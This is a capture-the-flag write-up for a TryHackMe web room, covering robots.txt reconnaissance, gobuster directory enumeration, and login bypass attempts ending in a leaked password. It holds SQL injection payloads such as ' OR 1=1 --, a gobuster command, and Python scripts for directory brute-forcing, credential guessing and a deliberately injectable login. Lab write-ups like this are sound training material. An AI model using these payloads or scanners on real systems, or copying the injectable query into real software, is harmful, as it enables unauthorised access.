TryHackMe CTF Writeup of Hidden Deep Into my Heart
Published 2026-7-5 06:34:31 via infosecwriteups.com

Devansh Patel

  • Hey guys, I am V3n0mKai back again with a new CTF writeup, this time on the TryHackMe room called “Hidden Deep Into my Heart”.
  • This is a web-category challenge, and from the challenge statement it looks like we have to find some hidden directories in order to get the flag.


Challenge Photo and Text
  • First click “Start Machine” and “Start the AttackBox”; once both are up we can reach the website.


The website page
  • On the site we start with the basics: well-known files, common endpoints, guessable directory names, and anything hidden in the page itself.
  • So we tried the following: robots.txt, sitemap.xml, reading the page source, a quick look in the browser developer tools, and trying common directory names in the URL.
  • robots.txt: a plain-text file served from the web root that implements the Robots Exclusion Protocol (REP). It tells crawlers which URLs they may fetch and which they should skip, usually to keep sensitive or duplicate pages out of search results and to cut down crawler traffic. It is advisory only: the file is public and nothing enforces it, so every Disallow entry is also a hint to an attacker about the paths the owner wanted kept quiet.
  • Also note the difference between crawling and indexing. Crawling is the crawler fetching and reading a page (and following its links); indexing is the search engine storing that page's content and metadata so it can show up in search results.
  • The X-Robots-Tag: noindex response header (or the equivalent meta tag) tells the engine not to index a page even after crawling it. For this to work, the page must not be blocked in robots.txt: if the crawler is forbidden from fetching it, it never sees the header, and the URL can still end up indexed from links on other pages.
  • sitemap.xml: an XML file listing the URLs the site owner wants crawled; crawlers use it alongside robots.txt to decide what to fetch.
  • Common directory names worth trying include admin, login, admin-panel, robots.txt, sitemap.xml, secret, index.php and many more. Ready-made wordlists for this ship with tools like DirBuster and are also available in GitHub repositories.
  • In robots.txt we found a directory named “cupids_secret_vault”, and browsing to that directory gave us the page below.
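Reading robots.txt the way an attacker does is the point of the bullets above: Disallow entries are paths to visit, and comments are worth a look too. The script below is an added example, not code from the writeup; it parses a robots.txt body, resolves the Disallow/Allow paths to full URLs, and flags comments that look like credentials. The sample body is constructed to mirror what the writeup describes (one Disallow entry for the vault directory and a comment carrying the password-looking string); the target IP and the secret-detection heuristic are assumptions.

```python
"""Read robots.txt the way an attacker does: each Disallow entry is a path the
owner wanted crawlers to skip (people and tools are not bound by it), and
comments occasionally leak things that never belonged in a public file.

Added example, not code from the writeup. The body below is constructed to
mirror the writeup: one Disallow entry and a credential-looking comment."""
import re
from urllib.parse import urljoin
from urllib.request import urlopen

# Constructed sample body; the file on the real target may be laid out differently.
SAMPLE_ROBOTS = """\
User-agent: *
# cupid_arrow_2026!!!
Disallow: /cupids_secret_vault/
Disallow: /tmp/   # scratch space
Allow: /
Sitemap: http://10.49.155.99:5000/sitemap.xml
"""


def looks_like_secret(text):
    """Heuristic only (an assumption, not a rule): flag a token of 8+ characters
    that mixes letters with digits or punctuation, the usual shape of a password."""
    for tok in text.split():
        if len(tok) >= 8 and re.search(r"[A-Za-z]", tok) and re.search(r"[0-9!@#$%^&*]", tok):
            return True
    return False


def parse_robots(body, base_url):
    """Return the paths and comments in a robots.txt body, with Disallow/Allow
    paths resolved to absolute URLs against base_url."""
    found = {"disallow": [], "allow": [], "sitemaps": [],
             "comments": [], "suspicious_comments": []}
    for raw in body.splitlines():
        # '#' starts a comment, either on its own line or after a directive.
        directive, _, comment = raw.partition("#")
        comment = comment.strip()
        if comment:
            found["comments"].append(comment)
            if looks_like_secret(comment):
                found["suspicious_comments"].append(comment)
        key, _, value = directive.partition(":")
        key, value = key.strip().lower(), value.strip()
        if not key or not value:
            continue  # blank line, comment-only line, or "Disallow:" with no path
        if key == "disallow":
            found["disallow"].append(urljoin(base_url, value))
        elif key == "allow":
            found["allow"].append(urljoin(base_url, value))
        elif key == "sitemap":
            found["sitemaps"].append(value)
    return found


def fetch_robots(base_url, timeout=10):
    """Fetch and parse /robots.txt from a live target (network use; the demo
    below does not call this)."""
    with urlopen(urljoin(base_url, "/robots.txt"), timeout=timeout) as resp:
        return parse_robots(resp.read().decode("utf-8", "replace"), base_url)


if __name__ == "__main__":
    result = parse_robots(SAMPLE_ROBOTS, "http://10.49.155.99:5000")
    for url in result["disallow"]:
        print("hidden path to visit:", url)
    for comment in result["suspicious_comments"]:
        print("comment worth trying as a credential:", comment)
```

Every Disallow URL the parser returns is a candidate for direct browsing and for a gobuster scan of its own; the suspicious comments go straight onto the password list for any login form found later.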


Robots.txt


The Webpage of the directory from the robots.txt
  • From here we ran gobuster against both URLs: first the bare IP URL, and second the directory found in robots.txt. So we started two scans.
  • Before going further, a short look at what gobuster actually is and which flags matter most for pulling information out of a target with effective directory enumeration.
  • Gobuster: a directory and file enumeration tool written in Go. Given a base URL and a wordlist, it requests each candidate path and reports the ones the server answers for, which is how hidden directories and sensitive files get found.
  • Gobuster is a concurrent brute-force engine: it takes a word, injects it somewhere (the URL path in dir mode, a hostname in dns/vhost mode, a bucket name in s3 mode, or the FUZZ placeholder in fuzz mode), compares the response, and filters the output.
  • The images below show the important flags and options of each gobuster mode that we can use during enumeration.
Gobuster Dir Mode


Gobuster DNS Mode


Gobuster VHOST Mode


Gobuster S3 Mode


Gobuster Fuzz Mode
  • With the gobuster options covered, the command below is what we used to enumerate hidden directories (this is the scan against the robots.txt directory; the other scan used the bare base URL). -w is the wordlist and -t 100 runs 100 concurrent requests.
gobuster dir -u http://10.49.155.99:5000/cupids_secret_vault/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 100
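To make the “take a word, inject it, compare the response, filter the output” loop concrete, here is an added example of the same mechanism in Python. It is neither gobuster's code nor the writeup's: a tiny local HTTP server stands in for the target so the script runs offline, the paths it serves and the wordlist are constructed, and the soft-404 calibration (blacklisting whatever status a random non-existent path returns) is an assumption about how a practitioner would handle sites that answer 200 for everything.

```python
"""A minimal version of what gobuster's dir mode does: take each word from a
wordlist, append it to the base URL, request it, and keep the responses whose
status is not on the "not found" list. Added example; not gobuster's code and
not the writeup's. A local HTTP server stands in for the target (constructed)."""
import http.server
import threading
import urllib.error
import urllib.request
import uuid
from concurrent.futures import ThreadPoolExecutor

# Constructed target: these paths exist, everything else answers 404.
KNOWN_PATHS = {
    "/cupids_secret_vault/": 200,
    "/cupids_secret_vault/administrator": 200,
    "/cupids_secret_vault/backup": 403,
}


class _Target(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        status = KNOWN_PATHS.get(self.path, 404)
        self.send_response(status)
        self.end_headers()
        self.wfile.write(b"ok" if status == 200 else b"no")

    def log_message(self, *_):
        pass  # keep the request log out of the demo output


def start_target():
    """Start the stand-in server on a free port; returns (server, base_url)."""
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", 0), _Target)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def probe(url, timeout=5):
    """Return the HTTP status for url (urllib raises HTTPError for 4xx/5xx)."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.getcode()
    except urllib.error.HTTPError as err:
        return err.code


def calibrate(base, blacklist):
    """Request a path that cannot exist. If the server does not answer 404 for
    it (a soft-404 site), treat that status as 'not found' as well."""
    return tuple(set(blacklist) | {probe(base + uuid.uuid4().hex)})


def enumerate_dirs(base_url, words, extensions=(), threads=10, blacklist=(404,)):
    """Brute-force base_url/<word> (and base_url/<word>.<ext>) concurrently and
    return sorted (url, status) pairs whose status is not blacklisted."""
    base = base_url.rstrip("/") + "/"
    blacklist = calibrate(base, blacklist)
    candidates = [base + w for w in words]
    candidates += [base + w + "." + ext for w in words for ext in extensions]
    with ThreadPoolExecutor(max_workers=threads) as pool:
        statuses = list(pool.map(probe, candidates))
    return sorted((u, s) for u, s in zip(candidates, statuses) if s not in blacklist)


if __name__ == "__main__":
    srv, target = start_target()
    wordlist = ["admin", "administrator", "backup", "login", "images"]  # constructed
    for url, status in enumerate_dirs(target + "/cupids_secret_vault", wordlist, extensions=("php",)):
        print(status, url)
    srv.shutdown()
```

A 403 is kept on purpose: it still proves the path exists, which is the same reason gobuster reports forbidden hits. Point enumerate_dirs() at a real base URL and a real wordlist to use it outside the demo.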


Scan 1


Scan 2
  • As we can see, scan 2 found an /administrator directory. Navigating to it showed a login page.


The administrator path
  • Here we have to try a bit of brute force and the usual username/password tricks.
  • So we tried some basic SQL injection payloads such as ' OR 1=1 -- , ' AND 1=1 -- , ' OR 1=2 -- and ' AND 1=2 -- , but they didn't work.
  • Then we tried common combinations like admin/admin, admin/password, administrator/admin and so on. These didn't work either. Then we remembered the comment we had found in robots.txt: 'cupid_arrow_2026!!!'.
  • Using username admin and password cupid_arrow_2026!!!, we logged in and, voila, found the flag.
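The two steps above (injection payloads first, then credential guessing ending with the robots.txt comment) are worth seeing against actual code. The block below is an added example, not the challenge's code: the table, the stored account and both login routines are constructed for illustration, so whether the real room's login was built this way is an assumption. It shows why ' OR 1=1 -- bypasses a login that concatenates user input into SQL, why the same payload does nothing against a parameterized query, and how the guess list from the writeup plays out.

```python
"""Why a login form gets fed ' OR 1=1 -- first, why it does nothing against a
parameterized query, and what the credential guessing that followed looks like.
Added example, not the challenge's code: the table, the stored account and both
login routines are constructed for illustration."""
import hashlib
import hmac
import sqlite3


def setup_db():
    """In-memory user table with the one account the writeup ends up using."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", hashlib.sha256(b"cupid_arrow_2026!!!").hexdigest()))
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """Builds the query by string formatting, so the username is parsed as SQL.
    The payload  ' OR 1=1 --  turns the WHERE clause into  username = '' OR 1=1
    and the rest of the line, password check included, becomes a comment."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = ("SELECT username FROM users WHERE username = '%s' AND password_hash = '%s'"
           % (username, pw_hash))
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Parameterized lookup plus constant-time hash comparison: the payload is
    just a username that does not exist, so every injection attempt fails."""
    row = db.execute("SELECT password_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return None
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    return username if hmac.compare_digest(row[0], pw_hash) else None


def spray(db, login, pairs):
    """Try (username, password) pairs in order; return the first that works."""
    for username, password in pairs:
        if login(db, username, password) == username:
            return (username, password)
    return None


# The order the writeup tried things: injection payloads, default pairs, then
# the string found as a comment in robots.txt.
INJECTION_PAYLOADS = ["' OR 1=1 -- ", "' AND 1=1 -- ", "' OR 1=2 -- ", "' AND 1=2 -- "]
GUESSES = [("admin", "admin"), ("admin", "password"), ("administrator", "admin"),
           ("admin", "cupid_arrow_2026!!!")]

if __name__ == "__main__":
    db = setup_db()
    for payload in INJECTION_PAYLOADS:
        print("%-16r vulnerable=%-6s safe=%s" % (
            payload, login_vulnerable(db, payload, "x"), login_safe(db, payload, "x")))
    print("first working pair:", spray(db, login_safe, GUESSES))
```

Of the four payloads only ' OR 1=1 -- logs in against the vulnerable version; the AND variants and OR 1=2 fail on both, which is why testing a true and a false condition side by side is the quick way to tell an injectable login from one that simply rejects you.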


Final Flag

Final Takeaway

Easy challenges are not about “easy wins.”

They are about sharpening instincts.

This TryHackMe room wasn’t about advanced exploitation.
It was about observation, enumeration, and thinking systematically.

CTFs are not about getting the flag.

They are about training your brain to:

a.] Look at robots.txt even when others skip it.
b.] Understand crawling vs indexing instead of memorizing definitions.
c.] Enumerate directories methodically, not randomly.
d.] Use tools like Gobuster with purpose, not blindly.
e.] Notice comments, hints, and small clues hidden in plain sight.

Security is rarely about complex zero-days.

It is often about:

Misplaced secrets.
Exposed directories.
Poor credential hygiene.
Developers leaving breadcrumbs behind.

This challenge reinforced something important:

Enumeration is power.
Patience is power.
Attention to detail is power.

If this writeup helped you strengthen your fundamentals in web enumeration and directory discovery, consider sharing it with your peers.

More enumeration.
More hidden paths.
More structured thinking.

Happy Hacking.


Source: https://infosecwriteups.com/tryhackme-ctf-writeup-of-hidden-deep-into-my-heart-a6624334a4b0?source=rss----7b722bfd1b8d---4